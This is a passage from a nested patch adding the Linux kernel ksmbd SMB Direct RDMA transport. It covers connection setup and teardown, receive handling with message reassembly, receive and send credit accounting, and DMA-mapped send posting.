++	 * Make sure reassembly_data_length is updated after list and
++	 * reassembly_queue_length are updated. On the dequeue side
++	 * reassembly_data_length is checked without a lock to determine
++	 * if reassembly_queue_length and list is up to date
++	 * if reassembly_queue_length and the list are up to date.
++	virt_wmb();
++	t->reassembly_data_length += data_length;
++	spin_unlock(&t->reassembly_queue_lock);
++}
++
++static struct smb_direct_recvmsg *get_first_reassembly(struct smb_direct_transport *t)
++{
++	if (!list_empty(&t->reassembly_queue))
++		return list_first_entry(&t->reassembly_queue,
++				struct smb_direct_recvmsg, list);
++	else
++		return NULL;
++}
++
++static void smb_direct_disconnect_rdma_work(struct work_struct *work)
++{
++	struct smb_direct_transport *t =
++		container_of(work, struct smb_direct_transport,
++			     disconnect_work);
++
++	if (t->status == SMB_DIRECT_CS_CONNECTED) {
++		t->status = SMB_DIRECT_CS_DISCONNECTING;
++		rdma_disconnect(t->cm_id);
++	}
++}
++
++static void
++smb_direct_disconnect_rdma_connection(struct smb_direct_transport *t)
++{
++	if (t->status == SMB_DIRECT_CS_CONNECTED)
++		queue_work(smb_direct_wq, &t->disconnect_work);
++}
++
++static void smb_direct_send_immediate_work(struct work_struct *work)
++{
++	struct smb_direct_transport *t = container_of(work,
++			struct smb_direct_transport, send_immediate_work);
++
++	if (t->status != SMB_DIRECT_CS_CONNECTED)
++		return;
++
++	smb_direct_post_send_data(t, NULL, NULL, 0, 0);
++}
++
++static struct smb_direct_transport *alloc_transport(struct rdma_cm_id *cm_id)
++{
++	struct smb_direct_transport *t;
++	struct ksmbd_conn *conn;
++
++	t = kzalloc(sizeof(*t), GFP_KERNEL);
++	if (!t)
++		return NULL;
++
++	t->cm_id = cm_id;
++	cm_id->context = t;
++
++	t->status = SMB_DIRECT_CS_NEW;
++	init_waitqueue_head(&t->wait_status);
++
++	spin_lock_init(&t->reassembly_queue_lock);
++	INIT_LIST_HEAD(&t->reassembly_queue);
++	t->reassembly_data_length = 0;
++	t->reassembly_queue_length = 0;
++	init_waitqueue_head(&t->wait_reassembly_queue);
++	init_waitqueue_head(&t->wait_send_credits);
++	init_waitqueue_head(&t->wait_rw_credits);
++
++	spin_lock_init(&t->receive_credit_lock);
++	spin_lock_init(&t->recvmsg_queue_lock);
++	INIT_LIST_HEAD(&t->recvmsg_queue);
++
++	spin_lock_init(&t->empty_recvmsg_queue_lock);
++	INIT_LIST_HEAD(&t->empty_recvmsg_queue);
++
++	init_waitqueue_head(&t->wait_send_pending);
++	atomic_set(&t->send_pending, 0);
++
++	spin_lock_init(&t->lock_new_recv_credits);
++
++	INIT_DELAYED_WORK(&t->post_recv_credits_work,
++			  smb_direct_post_recv_credits);
++	INIT_WORK(&t->send_immediate_work, smb_direct_send_immediate_work);
++	INIT_WORK(&t->disconnect_work, smb_direct_disconnect_rdma_work);
++
++	conn = ksmbd_conn_alloc();
++	if (!conn)
++		goto err;
++	conn->transport = KSMBD_TRANS(t);
++	KSMBD_TRANS(t)->conn = conn;
++	KSMBD_TRANS(t)->ops = &ksmbd_smb_direct_transport_ops;
++	return t;
++err:
++	kfree(t);
++	return NULL;
++}
++
++static void free_transport(struct smb_direct_transport *t)
++{
++	struct smb_direct_recvmsg *recvmsg;
++
++	wake_up_interruptible(&t->wait_send_credits);
++
++	ksmbd_debug(RDMA, "wait for all send posted to IB to finish\n");
++	wait_event(t->wait_send_pending,
++		   atomic_read(&t->send_pending) == 0);
++
++	cancel_work_sync(&t->disconnect_work);
++	cancel_delayed_work_sync(&t->post_recv_credits_work);
++	cancel_work_sync(&t->send_immediate_work);
++
++	if (t->qp) {
++		ib_drain_qp(t->qp);
++		ib_mr_pool_destroy(t->qp, &t->qp->rdma_mrs);
++		ib_destroy_qp(t->qp);
++	}
++
++	ksmbd_debug(RDMA, "drain the reassembly queue\n");
++	do {
++		spin_lock(&t->reassembly_queue_lock);
++		recvmsg = get_first_reassembly(t);
++		if (recvmsg) {
++			list_del(&recvmsg->list);
++			spin_unlock(&t->reassembly_queue_lock);
++			put_recvmsg(t, recvmsg);
++		} else {
++			spin_unlock(&t->reassembly_queue_lock);
++		}
++	} while (recvmsg);
++	t->reassembly_data_length = 0;
++
++	if (t->send_cq)
++		ib_free_cq(t->send_cq);
++	if (t->recv_cq)
++		ib_free_cq(t->recv_cq);
++	if (t->pd)
++		ib_dealloc_pd(t->pd);
++	if (t->cm_id)
++		rdma_destroy_id(t->cm_id);
++
++	smb_direct_destroy_pools(t);
++	ksmbd_conn_free(KSMBD_TRANS(t)->conn);
++	kfree(t);
++}
++
++static struct smb_direct_sendmsg *
++smb_direct_alloc_sendmsg(struct smb_direct_transport *t)
++{
++	struct smb_direct_sendmsg *msg;
++
++	msg = mempool_alloc(t->sendmsg_mempool, GFP_KERNEL);
++	if (!msg)
++		return ERR_PTR(-ENOMEM);
++	msg->transport = t;
++	INIT_LIST_HEAD(&msg->list);
++	msg->num_sge = 0;
++	return msg;
++}
++
++static void smb_direct_free_sendmsg(struct smb_direct_transport *t,
++				    struct smb_direct_sendmsg *msg)
++{
++	int i;
++
++	if (msg->num_sge > 0) {
++		ib_dma_unmap_single(t->cm_id->device,
++				    msg->sge[0].addr, msg->sge[0].length,
++				    DMA_TO_DEVICE);
++		for (i = 1; i < msg->num_sge; i++)
++			ib_dma_unmap_page(t->cm_id->device,
++					  msg->sge[i].addr, msg->sge[i].length,
++					  DMA_TO_DEVICE);
++	}
++	mempool_free(msg, t->sendmsg_mempool);
++}
++
++static int smb_direct_check_recvmsg(struct smb_direct_recvmsg *recvmsg)
++{
++	switch (recvmsg->type) {
++	case SMB_DIRECT_MSG_DATA_TRANSFER: {
++		struct smb_direct_data_transfer *req =
++			(struct smb_direct_data_transfer *)recvmsg->packet;
++		struct smb2_hdr *hdr = (struct smb2_hdr *)(recvmsg->packet
++				+ le32_to_cpu(req->data_offset));
++		ksmbd_debug(RDMA,
++			    "CreditGranted: %u, CreditRequested: %u, DataLength: %u, RemainingDataLength: %u, SMB: %x, Command: %u\n",
++			    le16_to_cpu(req->credits_granted),
++			    le16_to_cpu(req->credits_requested),
++			    req->data_length, req->remaining_data_length,
++			    hdr->ProtocolId, hdr->Command);
++		break;
++	}
++	case SMB_DIRECT_MSG_NEGOTIATE_REQ: {
++		struct smb_direct_negotiate_req *req =
++			(struct smb_direct_negotiate_req *)recvmsg->packet;
++		ksmbd_debug(RDMA,
++			    "MinVersion: %u, MaxVersion: %u, CreditRequested: %u, MaxSendSize: %u, MaxRecvSize: %u, MaxFragmentedSize: %u\n",
++			    le16_to_cpu(req->min_version),
++			    le16_to_cpu(req->max_version),
++			    le16_to_cpu(req->credits_requested),
++			    le32_to_cpu(req->preferred_send_size),
++			    le32_to_cpu(req->max_receive_size),
++			    le32_to_cpu(req->max_fragmented_size));
++		if (le16_to_cpu(req->min_version) > 0x0100 ||
++		    le16_to_cpu(req->max_version) < 0x0100)
++			return -EOPNOTSUPP;
++		if (le16_to_cpu(req->credits_requested) <= 0 ||
++		    le32_to_cpu(req->max_receive_size) <= 128 ||
++		    le32_to_cpu(req->max_fragmented_size) <=
++					128 * 1024)
++			return -ECONNABORTED;
++
++		break;
++	}
++	default:
++		return -EINVAL;
++	}
++	return 0;
++}
++
++static void recv_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	struct smb_direct_recvmsg *recvmsg;
++	struct smb_direct_transport *t;
++
++	recvmsg = container_of(wc->wr_cqe, struct smb_direct_recvmsg, cqe);
++	t = recvmsg->transport;
++
++	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_RECV) {
++		if (wc->status != IB_WC_WR_FLUSH_ERR) {
++			pr_err("Recv error. status='%s (%d)' opcode=%d\n",
++			       ib_wc_status_msg(wc->status), wc->status,
++			       wc->opcode);
++			smb_direct_disconnect_rdma_connection(t);
++		}
++		put_empty_recvmsg(t, recvmsg);
++		return;
++	}
++
++	ksmbd_debug(RDMA, "Recv completed. status='%s (%d)', opcode=%d\n",
++		    ib_wc_status_msg(wc->status), wc->status,
++		    wc->opcode);
++
++	ib_dma_sync_single_for_cpu(wc->qp->device, recvmsg->sge.addr,
++				   recvmsg->sge.length, DMA_FROM_DEVICE);
++
++	switch (recvmsg->type) {
++	case SMB_DIRECT_MSG_NEGOTIATE_REQ:
++		if (wc->byte_len < sizeof(struct smb_direct_negotiate_req)) {
++			put_empty_recvmsg(t, recvmsg);
++			return;
++		}
++		t->negotiation_requested = true;
++		t->full_packet_received = true;
++		t->status = SMB_DIRECT_CS_CONNECTED;
++		enqueue_reassembly(t, recvmsg, 0);
++		wake_up_interruptible(&t->wait_status);
++		break;
++	case SMB_DIRECT_MSG_DATA_TRANSFER: {
++		struct smb_direct_data_transfer *data_transfer =
++			(struct smb_direct_data_transfer *)recvmsg->packet;
++		unsigned int data_length;
++		int avail_recvmsg_count, receive_credits;
++
++		if (wc->byte_len <
++		    offsetof(struct smb_direct_data_transfer, padding)) {
++			put_empty_recvmsg(t, recvmsg);
++			return;
++		}
++
++		data_length = le32_to_cpu(data_transfer->data_length);
++		if (data_length) {
++			if (wc->byte_len < sizeof(struct smb_direct_data_transfer) +
++			    (u64)data_length) {
++				put_empty_recvmsg(t, recvmsg);
++				return;
++			}
++
++			if (t->full_packet_received)
++				recvmsg->first_segment = true;
++
++			if (le32_to_cpu(data_transfer->remaining_data_length))
++				t->full_packet_received = false;
++			else
++				t->full_packet_received = true;
++
++			enqueue_reassembly(t, recvmsg, (int)data_length);
++			wake_up_interruptible(&t->wait_reassembly_queue);
++
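++			/* Each completed receive consumes one credit; track
++			 * the remaining credits and free buffers to decide
++			 * below whether more receives must be posted.
++			 */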
++			spin_lock(&t->receive_credit_lock);
++			receive_credits = --(t->recv_credits);
++			avail_recvmsg_count = t->count_avail_recvmsg;
++			spin_unlock(&t->receive_credit_lock);
++		} else {
++			put_empty_recvmsg(t, recvmsg);
++
++			spin_lock(&t->receive_credit_lock);
++			receive_credits = --(t->recv_credits);
++			avail_recvmsg_count = ++(t->count_avail_recvmsg);
++			spin_unlock(&t->receive_credit_lock);
++		}
++
++		t->recv_credit_target =
++				le16_to_cpu(data_transfer->credits_requested);
++		atomic_add(le16_to_cpu(data_transfer->credits_granted),
++			   &t->send_credits);
++
++		if (le16_to_cpu(data_transfer->flags) &
++		    SMB_DIRECT_RESPONSE_REQUESTED)
++			queue_work(smb_direct_wq, &t->send_immediate_work);
++
++		if (atomic_read(&t->send_credits) > 0)
++			wake_up_interruptible(&t->wait_send_credits);
++
++		if (is_receive_credit_post_required(receive_credits, avail_recvmsg_count))
++			mod_delayed_work(smb_direct_wq,
++					 &t->post_recv_credits_work, 0);
++		break;
++	}
++	default:
++		break;
++	}
++}
++
++static int smb_direct_post_recv(struct smb_direct_transport *t,
++				struct smb_direct_recvmsg *recvmsg)
++{
++	struct ib_recv_wr wr;
++	int ret;
++
++	recvmsg->sge.addr = ib_dma_map_single(t->cm_id->device,
++					      recvmsg->packet, t->max_recv_size,
++					      DMA_FROM_DEVICE);
++	ret = ib_dma_mapping_error(t->cm_id->device, recvmsg->sge.addr);
++	if (ret)
++		return ret;
++	recvmsg->sge.length = t->max_recv_size;
++	recvmsg->sge.lkey = t->pd->local_dma_lkey;
++	recvmsg->cqe.done = recv_done;
++
++	wr.wr_cqe = &recvmsg->cqe;
++	wr.next = NULL;
++	wr.sg_list = &recvmsg->sge;
++	wr.num_sge = 1;
++
++	ret = ib_post_recv(t->qp, &wr, NULL);
++	if (ret) {
++		pr_err("Can't post recv: %d\n", ret);
++		ib_dma_unmap_single(t->cm_id->device,
++				    recvmsg->sge.addr, recvmsg->sge.length,
++				    DMA_FROM_DEVICE);
++		smb_direct_disconnect_rdma_connection(t);
++		return ret;
++	}
++	return ret;
++}
++
++static int smb_direct_read(struct ksmbd_transport *t, char *buf,
++			   unsigned int size, int unused)
++{
++	struct smb_direct_recvmsg *recvmsg;
++	struct smb_direct_data_transfer *data_transfer;
++	int to_copy, to_read, data_read, offset;
++	u32 data_length, remaining_data_length, data_offset;
++	int rc;
++	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
++
++again:
++	if (st->status != SMB_DIRECT_CS_CONNECTED) {
++		pr_err("disconnected\n");
++		return -ENOTCONN;
++	}
++
++	/*
++	 * No need to hold the reassembly queue lock all the time as we are
++	 * the only one reading from the front of the queue. The transport
++	 * may add more entries to the back of the queue at the same time.
++	 */
++	if (st->reassembly_data_length >= size) {
++		int queue_length;
++		int queue_removed = 0;
++
++		/*
++		 * Need to make sure reassembly_data_length is read before
++		 * reading reassembly_queue_length and calling
++		 * get_first_reassembly. This call is lock-free
++		 * as we never read at the end of the queue, which is being
++		 * updated in softirq context as more data is received.
++		 */
++		virt_rmb();
++		queue_length = st->reassembly_queue_length;
++		data_read = 0;
++		to_read = size;
++		offset = st->first_entry_offset;
++		while (data_read < size) {
++			recvmsg = get_first_reassembly(st);
++			data_transfer = smb_direct_recvmsg_payload(recvmsg);
++			data_length = le32_to_cpu(data_transfer->data_length);
++			remaining_data_length =
++				le32_to_cpu(data_transfer->remaining_data_length);
++			data_offset = le32_to_cpu(data_transfer->data_offset);
++
++			/*
++			 * The upper layer expects RFC1002 length at the
++			 * beginning of the payload. Return it to indicate
++			 * the total length of the packet. This minimizes the
++			 * change to the upper layer packet processing logic and
++			 * will eventually be removed when an intermediate
++			 * transport layer is added.
++			 */
++			if (recvmsg->first_segment && size == 4) {
++				unsigned int rfc1002_len =
++					data_length + remaining_data_length;
++				*((__be32 *)buf) = cpu_to_be32(rfc1002_len);
++				data_read = 4;
++				recvmsg->first_segment = false;
++				ksmbd_debug(RDMA,
++					    "returning rfc1002 length %d\n",
++					    rfc1002_len);
++				goto read_rfc1002_done;
++			}
++
++			to_copy = min_t(int, data_length - offset, to_read);
++			memcpy(buf + data_read, (char *)data_transfer + data_offset + offset,
++			       to_copy);
++
++			/* move on to the next buffer? */
++			if (to_copy == data_length - offset) {
++				queue_length--;
++				/*
++				 * No need to lock if we are not at the
++				 * end of the queue
++				 */
++				if (queue_length) {
++					list_del(&recvmsg->list);
++				} else {
++					spin_lock_irq(&st->reassembly_queue_lock);
++					list_del(&recvmsg->list);
++					spin_unlock_irq(&st->reassembly_queue_lock);
++				}
++				queue_removed++;
++				put_recvmsg(st, recvmsg);
++				offset = 0;
++			} else {
++				offset += to_copy;
++			}
++
++			to_read -= to_copy;
++			data_read += to_copy;
++		}
++
++		spin_lock_irq(&st->reassembly_queue_lock);
++		st->reassembly_data_length -= data_read;
++		st->reassembly_queue_length -= queue_removed;
++		spin_unlock_irq(&st->reassembly_queue_lock);
++
++		spin_lock(&st->receive_credit_lock);
++		st->count_avail_recvmsg += queue_removed;
++		if (is_receive_credit_post_required(st->recv_credits, st->count_avail_recvmsg)) {
++			spin_unlock(&st->receive_credit_lock);
++			mod_delayed_work(smb_direct_wq,
++					 &st->post_recv_credits_work, 0);
++		} else {
++			spin_unlock(&st->receive_credit_lock);
++		}
++
++		st->first_entry_offset = offset;
++		ksmbd_debug(RDMA,
++			    "returning to thread data_read=%d reassembly_data_length=%d first_entry_offset=%d\n",
++			    data_read, st->reassembly_data_length,
++			    st->first_entry_offset);
++read_rfc1002_done:
++		return data_read;
++	}
++
++	ksmbd_debug(RDMA, "wait_event on more data\n");
++	rc = wait_event_interruptible(st->wait_reassembly_queue,
++				      st->reassembly_data_length >= size ||
++				       st->status != SMB_DIRECT_CS_CONNECTED);
++	if (rc)
++		return -EINTR;
++
++	goto again;
++}
++
++static void smb_direct_post_recv_credits(struct work_struct *work)
++{
++	struct smb_direct_transport *t = container_of(work,
++		struct smb_direct_transport, post_recv_credits_work.work);
++	struct smb_direct_recvmsg *recvmsg;
++	int receive_credits, credits = 0;
++	int ret;
++	int use_free = 1;
++
++	spin_lock(&t->receive_credit_lock);
++	receive_credits = t->recv_credits;
++	spin_unlock(&t->receive_credit_lock);
++
++	if (receive_credits < t->recv_credit_target) {
++		while (true) {
++			if (use_free)
++				recvmsg = get_free_recvmsg(t);
++			else
++				recvmsg = get_empty_recvmsg(t);
++			if (!recvmsg) {
++				if (use_free) {
++					use_free = 0;
++					continue;
++				} else {
++					break;
++				}
++			}
++
++			recvmsg->type = SMB_DIRECT_MSG_DATA_TRANSFER;
++			recvmsg->first_segment = false;
++
++			ret = smb_direct_post_recv(t, recvmsg);
++			if (ret) {
++				pr_err("Can't post recv: %d\n", ret);
++				put_recvmsg(t, recvmsg);
++				break;
++			}
++			credits++;
++		}
++	}
++
++	spin_lock(&t->receive_credit_lock);
++	t->recv_credits += credits;
++	t->count_avail_recvmsg -= credits;
++	spin_unlock(&t->receive_credit_lock);
++
++	spin_lock(&t->lock_new_recv_credits);
++	t->new_recv_credits += credits;
++	spin_unlock(&t->lock_new_recv_credits);
++
++	if (credits)
++		queue_work(smb_direct_wq, &t->send_immediate_work);
++}
++
++static void send_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	struct smb_direct_sendmsg *sendmsg, *sibling;
++	struct smb_direct_transport *t;
++	struct list_head *pos, *prev, *end;
++
++	sendmsg = container_of(wc->wr_cqe, struct smb_direct_sendmsg, cqe);
++	t = sendmsg->transport;
++
++	ksmbd_debug(RDMA, "Send completed. status='%s (%d)', opcode=%d\n",
++		    ib_wc_status_msg(wc->status), wc->status,
++		    wc->opcode);
++
++	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_SEND) {
++		pr_err("Send error. status='%s (%d)', opcode=%d\n",
++		       ib_wc_status_msg(wc->status), wc->status,
++		       wc->opcode);
++		smb_direct_disconnect_rdma_connection(t);
++	}
++
++	if (atomic_dec_and_test(&t->send_pending))
++		wake_up(&t->wait_send_pending);
++
++	/* Iterate and free the list of messages in reverse order; the
++	 * list's head itself is not a valid message.
++	 */
++	for (pos = &sendmsg->list, prev = pos->prev, end = sendmsg->list.next;
++	     prev != end; pos = prev, prev = prev->prev) {
++		sibling = container_of(pos, struct smb_direct_sendmsg, list);
++		smb_direct_free_sendmsg(t, sibling);
++	}
++
++	sibling = container_of(pos, struct smb_direct_sendmsg, list);
++	smb_direct_free_sendmsg(t, sibling);
++}
++
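++/*
++ * Atomically collect the receive credits accumulated since the last
++ * send so they can be granted to the peer in the next packet's
++ * credits_granted field.
++ */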
++static int manage_credits_prior_sending(struct smb_direct_transport *t)
++{
++	int new_credits;
++
++	spin_lock(&t->lock_new_recv_credits);
++	new_credits = t->new_recv_credits;
++	t->new_recv_credits = 0;
++	spin_unlock(&t->lock_new_recv_credits);
++
++	return new_credits;
++}
++
++static int smb_direct_post_send(struct smb_direct_transport *t,
++				struct ib_send_wr *wr)
++{
++	int ret;
++
++	atomic_inc(&t->send_pending);
++	ret = ib_post_send(t->qp, wr, NULL);
++	if (ret) {
++		pr_err("failed to post send: %d\n", ret);
++		if (atomic_dec_and_test(&t->send_pending))
++			wake_up(&t->wait_send_pending);
++		smb_direct_disconnect_rdma_connection(t);
++	}
++	return ret;
++}
++
++static void smb_direct_send_ctx_init(struct smb_direct_transport *t,
++				     struct smb_direct_send_ctx *send_ctx,
++				     bool need_invalidate_rkey,
++				     unsigned int remote_key)
++{
++	INIT_LIST_HEAD(&send_ctx->msg_list);
++	send_ctx->wr_cnt = 0;
++	send_ctx->need_invalidate_rkey = need_invalidate_rkey;
++	send_ctx->remote_key = remote_key;
++}
++
++static int smb_direct_flush_send_list(struct smb_direct_transport *t,
++				      struct smb_direct_send_ctx *send_ctx,
++				      bool is_last)
++{
++	struct smb_direct_sendmsg *first, *last;
++	int ret;
++
++	if (list_empty(&send_ctx->msg_list))
++		return 0;
++
++	first = list_first_entry(&send_ctx->msg_list,
++				 struct smb_direct_sendmsg,
++				 list);
++	last = list_last_entry(&send_ctx->msg_list,
++			       struct smb_direct_sendmsg,
++			       list);
++
++	last->wr.send_flags = IB_SEND_SIGNALED;
++	last->wr.wr_cqe = &last->cqe;
++	if (is_last && send_ctx->need_invalidate_rkey) {
++		last->wr.opcode = IB_WR_SEND_WITH_INV;
++		last->wr.ex.invalidate_rkey = send_ctx->remote_key;
++	}
++
++	ret = smb_direct_post_send(t, &first->wr);
++	if (!ret) {
++		smb_direct_send_ctx_init(t, send_ctx,
++					 send_ctx->need_invalidate_rkey,
++					 send_ctx->remote_key);
++	} else {
++		atomic_add(send_ctx->wr_cnt, &t->send_credits);
++		wake_up(&t->wait_send_credits);
++		list_for_each_entry_safe(first, last, &send_ctx->msg_list,
++					 list) {
++			smb_direct_free_sendmsg(t, first);
++		}
++	}
++	return ret;
++}
++
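++/*
++ * Optimistically take @needed credits with atomic_sub_return(); if the
++ * counter would go negative, return the credits and sleep until enough
++ * have been released or the transport is no longer connected.
++ */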
++static int wait_for_credits(struct smb_direct_transport *t,
++			    wait_queue_head_t *waitq, atomic_t *total_credits,
++			    int needed)
++{
++	int ret;
++
++	do {
++		if (atomic_sub_return(needed, total_credits) >= 0)
++			return 0;
++
++		atomic_add(needed, total_credits);
++		ret = wait_event_interruptible(*waitq,
++					       atomic_read(total_credits) >= needed ||
++					       t->status != SMB_DIRECT_CS_CONNECTED);
++
++		if (t->status != SMB_DIRECT_CS_CONNECTED)
++			return -ENOTCONN;
++		else if (ret < 0)
++			return ret;
++	} while (true);
++}
++
++static int wait_for_send_credits(struct smb_direct_transport *t,
++				 struct smb_direct_send_ctx *send_ctx)
++{
++	int ret;
++
++	if (send_ctx &&
++	    (send_ctx->wr_cnt >= 16 || atomic_read(&t->send_credits) <= 1)) {
++		ret = smb_direct_flush_send_list(t, send_ctx, false);
++		if (ret)
++			return ret;
++	}
++
++	return wait_for_credits(t, &t->wait_send_credits, &t->send_credits, 1);
++}
++
++static int wait_for_rw_credits(struct smb_direct_transport *t, int credits)
++{
++	return wait_for_credits(t, &t->wait_rw_credits, &t->rw_credits, credits);
++}
++
++static int calc_rw_credits(struct smb_direct_transport *t,
++			   char *buf, unsigned int len)
++{
++	return DIV_ROUND_UP(get_buf_page_count(buf, len),
++			    t->pages_per_rw_credit);
++}
++
++static int smb_direct_create_header(struct smb_direct_transport *t,
++				    int size, int remaining_data_length,
++				    struct smb_direct_sendmsg **sendmsg_out)
++{
++	struct smb_direct_sendmsg *sendmsg;
++	struct smb_direct_data_transfer *packet;
++	int header_length;
++	int ret;
++
++	sendmsg = smb_direct_alloc_sendmsg(t);
++	if (IS_ERR(sendmsg))
++		return PTR_ERR(sendmsg);
++
++	/* Fill in the packet header */
++	packet = (struct smb_direct_data_transfer *)sendmsg->packet;
++	packet->credits_requested = cpu_to_le16(t->send_credit_target);
++	packet->credits_granted = cpu_to_le16(manage_credits_prior_sending(t));
++
++	packet->flags = 0;
++	packet->reserved = 0;
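++	/*
++	 * A data offset of 24 is the size of the smb_direct_data_transfer
++	 * header up to and including the padding field; the payload
++	 * follows immediately after it.
++	 */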
++	if (!size)
++		packet->data_offset = 0;
++	else
++		packet->data_offset = cpu_to_le32(24);
++	packet->data_length = cpu_to_le32(size);
++	packet->remaining_data_length = cpu_to_le32(remaining_data_length);
++	packet->padding = 0;
++
++	ksmbd_debug(RDMA,
++		    "credits_requested=%d credits_granted=%d data_offset=%d data_length=%d remaining_data_length=%d\n",
++		    le16_to_cpu(packet->credits_requested),
++		    le16_to_cpu(packet->credits_granted),
++		    le32_to_cpu(packet->data_offset),
++		    le32_to_cpu(packet->data_length),
++		    le32_to_cpu(packet->remaining_data_length));
++
++	/* Map the packet to DMA */
++	header_length = sizeof(struct smb_direct_data_transfer);
++	/* If this is a packet without payload, don't send padding */
++	if (!size)
++		header_length =
++			offsetof(struct smb_direct_data_transfer, padding);
++
++	sendmsg->sge[0].addr = ib_dma_map_single(t->cm_id->device,
++						 (void *)packet,
++						 header_length,
++						 DMA_TO_DEVICE);
++	ret = ib_dma_mapping_error(t->cm_id->device, sendmsg->sge[0].addr);
++	if (ret) {
++		smb_direct_free_sendmsg(t, sendmsg);
++		return ret;
++	}
++
++	sendmsg->num_sge = 1;
++	sendmsg->sge[0].length = header_length;
++	sendmsg->sge[0].lkey = t->pd->local_dma_lkey;
++
++	*sendmsg_out = sendmsg;
++	return 0;
++}
++
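++/*
++ * Fill a scatterlist with one entry per page of the buffer, which may
++ * be kmalloc'd or vmalloc'd. Returns the number of entries used, or
++ * -EINVAL if @nentries is too small to cover the buffer.
++ */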
++static int get_sg_list(void *buf, int size, struct scatterlist *sg_list, int nentries)
++{
++	bool high = is_vmalloc_addr(buf);
++	struct page *page;
++	int offset, len;
++	int i = 0;
++
++	if (size <= 0 || nentries < get_buf_page_count(buf, size))
++		return -EINVAL;
++
++	offset = offset_in_page(buf);
++	buf -= offset;
++	while (size > 0) {
++		len = min_t(int, PAGE_SIZE - offset, size);
++		if (high)
++			page = vmalloc_to_page(buf);
++		else
++			page = kmap_to_page(buf);
++
++		if (!sg_list)
++			return -EINVAL;
++		sg_set_page(sg_list, page, len, offset);
++		sg_list = sg_next(sg_list);
++
++		buf += PAGE_SIZE;
++		size -= len;
++		offset = 0;
++		i++;
++	}
++	return i;
++}
++
++static int get_mapped_sg_list(struct ib_device *device, void *buf, int size,
++			      struct scatterlist *sg_list, int nentries,
++			      enum dma_data_direction dir)
++{
++	int npages;
++
++	npages = get_sg_list(buf, size, sg_list, nentries);
++	if (npages < 0)
++		return -EINVAL;
++	return ib_dma_map_sg(device, sg_list, npages, dir);
++}
++
++static int post_sendmsg(struct smb_direct_transport *t,
++			struct smb_direct_send_ctx *send_ctx,
++			struct smb_direct_sendmsg *msg)
++{
++	int i;
++
++	for (i = 0; i < msg->num_sge; i++)
++		ib_dma_sync_single_for_device(t->cm_id->device,
++					      msg->sge[i].addr, msg->sge[i].length,
++					      DMA_TO_DEVICE);
++
++	msg->cqe.done = send_done;
++	msg->wr.opcode = IB_WR_SEND;
++	msg->wr.sg_list = &msg->sge[0];
++	msg->wr.num_sge = msg->num_sge;
++	msg->wr.next = NULL;
++
++	if (send_ctx) {
++		msg->wr.wr_cqe = NULL;
++		msg->wr.send_flags = 0;
++		if (!list_empty(&send_ctx->msg_list)) {
++			struct smb_direct_sendmsg *last;
++
++			last = list_last_entry(&send_ctx->msg_list,
++					       struct smb_direct_sendmsg,
++					       list);
++			last->wr.next = &msg->wr;
++		}
++		list_add_tail(&msg->list, &send_ctx->msg_list);
++		send_ctx->wr_cnt++;
++		return 0;
++	}
++
++	msg->wr.wr_cqe = &msg->cqe;
++	msg->wr.send_flags = IB_SEND_SIGNALED;
++	return smb_direct_post_send(t, &msg->wr);
++}
++
++static int smb_direct_post_send_data(struct smb_direct_transport *t,
++				     struct smb_direct_send_ctx *send_ctx,
++				     struct kvec *iov, int niov,
++				     int remaining_data_length)
++{
++	int i, j, ret;
++	struct smb_direct_sendmsg *msg;
++	int data_length;
++	struct scatterlist sg[SMB_DIRECT_MAX_SEND_SGES - 1];
++
++	ret = wait_for_send_credits(t, send_ctx);
++	if (ret)
++		return ret;
++
++	data_length = 0;
++	for (i = 0; i < niov; i++)
++		data_length += iov[i].iov_len;
++
++	ret = smb_direct_create_header(t, data_length, remaining_data_length,
++				       &msg);
++	if (ret) {
++		atomic_inc(&t->send_credits);
++		return ret;
++	}
++
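++	/* DMA-map every iovec entry and append the mappings as SGEs of
++	 * the single send work request that carries header and payload.
++	 */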
++	for (i = 0; i < niov; i++) {
++		struct ib_sge *sge;
++		int sg_cnt;
++
++		sg_init_table(sg, SMB_DIRECT_MAX_SEND_SGES - 1);
++		sg_cnt = get_mapped_sg_list(t->cm_id->device,
++					    iov[i].iov_base, iov[i].iov_len,
++					    sg, SMB_DIRECT_MAX_SEND_SGES - 1,
++					    DMA_TO_DEVICE);
++		if (sg_cnt <= 0) {
++			pr_err("failed to map buffer\n");
++			ret = -ENOMEM;
++			goto err;
++		} else if (sg_cnt + msg->num_sge > SMB_DIRECT_MAX_SEND_SGES) {
++			pr_err("buffer not fitted into sges\n");
++			ret = -E2BIG;
++			ib_dma_unmap_sg(t->cm_id->device, sg, sg_cnt,
++					DMA_TO_DEVICE);
++			goto err;
++		}
++
++		for (j = 0; j < sg_cnt; j++) {
++			sge = &msg->sge[msg->num_sge];
++			sge->addr = sg_dma_address(&sg[j]);
++			sge->length = sg_dma_len(&sg[j]);
++			sge->lkey  = t->pd->local_dma_lkey;
++			msg->num_sge++;
++		}
++	}
++
++	ret = post_sendmsg(t, send_ctx, msg);
++	if (ret)
++		goto err;
++	return 0;
++err:
++	smb_direct_free_sendmsg(t, msg);
++	atomic_inc(&t->send_credits);
++	return ret;
++}
++
++static int smb_direct_writev(struct ksmbd_transport *t,
++			     struct kvec *iov, int niovs, int buflen,
++			     bool need_invalidate, unsigned int remote_key)
++{
++	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
++	int remaining_data_length;
++	int start, i, j;
++	int max_iov_size = st->max_send_size -
++			sizeof(struct smb_direct_data_transfer);
++	int ret;
++	struct kvec vec;
++	struct smb_direct_send_ctx send_ctx;
++
++	if (st->status != SMB_DIRECT_CS_CONNECTED)
++		return -ENOTCONN;
++
++	/* FIXME: skip the RFC1002 header */
++	buflen -= 4;
++	iov[0].iov_base += 4;
++	iov[0].iov_len -= 4;
++
++	remaining_data_length = buflen;
++	ksmbd_debug(RDMA, "Sending smb (RDMA): smb_len=%u\n", buflen);
++
++	smb_direct_send_ctx_init(st, &send_ctx, need_invalidate, remote_key);
++	start = i = 0;
++	buflen = 0;
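++	/*
++	 * Batch consecutive iovec entries into one send until adding the
++	 * next entry would exceed max_iov_size; a single entry larger
++	 * than max_iov_size is split into max_iov_size-sized chunks.
++	 */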
++	while (true) {
++		buflen += iov[i].iov_len;
++		if (buflen > max_iov_size) {
++			if (i > start) {
++				remaining_data_length -=
++					(buflen - iov[i].iov_len);
++				ret = smb_direct_post_send_data(st, &send_ctx,
++								&iov[start], i - start,
++								remaining_data_length);
++				if (ret)
++					goto done;
++			} else {
